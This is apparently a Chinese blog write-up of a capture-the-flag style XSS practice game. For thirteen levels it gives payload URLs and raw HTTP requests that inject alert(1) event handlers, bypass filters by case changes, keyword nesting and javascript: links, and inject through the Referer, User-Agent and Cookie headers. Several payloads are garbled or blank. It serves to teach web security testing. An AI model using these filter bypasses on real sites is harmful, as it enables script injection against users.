ctf xss利用_【CTF】某xss练手小游戏

本文介绍了在ctf比赛中遇到的一系列XSS练习,包括不同级别的漏洞利用方法,如事件注入、编码绕过、标签嵌套等,详细展示了如何构造有效payload来触发XSS攻击。
摘要由CSDN通过智能技术生成

http://test.xss.tv

1、http://47.94.13.75/test/level1.php?name=test

直接插入即可,如:

http://47.94.13.75/test/level1.php?name=

2、http://47.94.13.75/test/level2.php?keyword=test

文本框中输入,闭合一下即可,如:

http://47.94.13.75/test/level2.php?keyword=">

3、http://47.94.13.75/test/level3.php?writing=wait

尖括号被编码,直接使用事件即可,如:

http://47.94.13.75/test/level3.php?keyword=' οnmοuseοver=alert(1) '&submit=搜索

4、http://47.94.13.75/test/level4.php?keyword=try harder!

与第三关类似,使用事件来闭合,弹窗,如:

http://47.94.13.75/test/level4.php?keyword=" οnmοuseοver=alert(1) "&submit=搜索

5、http://47.94.13.75/test/level5.php?keyword=find a way out!

事件被插入特殊符号,改用其它标签,如:

http://47.94.13.75/test/level5.php?keyword=">click&submit=搜索

点击click链接即可弹窗

6、http://47.94.13.75/test/level6.php?keyword=break it out!

与第五关类似,这里可以直接用大写绕过,如:

http://47.94.13.75/test/level6.php?keyword=" Onmouseover=alert(1) "&submit=搜索

7、http://47.94.13.75/test/level7.php?keyword=move up!

on直接被过滤,用嵌套绕过,如:

http://47.94.13.75/test/level7.php?keyword=" oonnmouseover=alert(1) "&submit=搜索

8、http://47.94.13.75/test/level8.php?keyword=nice try!

链接型,js协议加编码绕过绕过,如:

http://47.94.13.75/test/level8.php?keyword=javascript:alert(1)&submit=添加友情链接

9、http://47.94.13.75/test/level9.php?keyword=not bad!

构造合法链接,结合js协议与编码绕过,如:

http://47.94.13.75/test/level9.php?keyword=javascript:alert("http://")&submit=添加友情链接

10、http://47.94.13.75/test/level10.php?keyword=well done!

根据源码构造url参数,如:

http://47.94.13.75/test/level10.php?keyword=well done!&t_sort=xss" οnmοuseοver=alert(1) type="button" "

http://47.94.13.75/test/level10.php?keyword=well done!&t_sort=xss" accesskey="X" οnclick=“alert(1)  ///通过shift+alt+X快捷键触发(火狐可以)

11、http://47.94.13.75/test/level11.php?keyword=good job!

抓取post数据包,构造referer值,如:

GET /test/level11.php?keyword=good%20job! HTTP/1.1

Host: 47.94.13.75

User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:58.0) Gecko/20100101 Firefox/58.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Accept-Encoding: gzip, deflate

Connection: keep-alive

Upgrade-Insecure-Requests: 1

Referer:" οnmοuseοver=alert(1) type="button" "

12、http://47.94.13.75/test/level12.php?keyword=good job!

构造user-agent值即可,如:

GET /test/level12.php?keyword=good%20job! HTTP/1.1

Host: 47.94.13.75

User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:58.0) Gecko/20100101 Firefox/58.0" οnmοuseοver=alert(1) type="button" "

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Accept-Encoding: gzip, deflate

Connection: keep-alive

Upgrade-Insecure-Requests: 1

13、http://47.94.13.75/test/level13.php?keyword=good job!

构造cookie,如:

GET /test/level13.php?keyword=good%20job! HTTP/1.1

Host: 47.94.13.75

User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:58.0) Gecko/20100101 Firefox/58.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Accept-Encoding: gzip, deflate

Cookie: user=call+me+maybe%3F" οnmοuseοver=alert(1) type="button" "

Connection: keep-alive

Upgrade-Insecure-Requests: 1

在010ctf中,XSSPawn是一种灵活且可自定义的访客bot,用于CTF挑战设置,主要是XSS攻击的挑战。它是基于触发器的,由Express驱动的服务,依赖于HTTP请求通信。 在XSS攻击中,一般情况下,self代表只接受符合同源策略的url,这样大部分的XSS和CSRF攻击都会失效。但是link标签是一个例外,我们可以通过link标签绕过CSP(Content Security Policy)的限制[2]。 在CSP级别2中,定义加载frame的有效源已经被弃用,取而代之的是child-src指令。而在CSP级别3中,虽然frame-src被弃用,但如果不存在,它将继续遵从child-src指令。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [XSSPawn:XSSPawn是一种灵活且可自定义的访客... 主要用作CTF XSS Bot。 它基于CTFTraining的base_image_xssbot](https://download.csdn.net/download/weixin_42160278/16560757)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *2* *3* [CTF XSS](https://blog.csdn.net/weixin_33945512/article/details/112950722)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值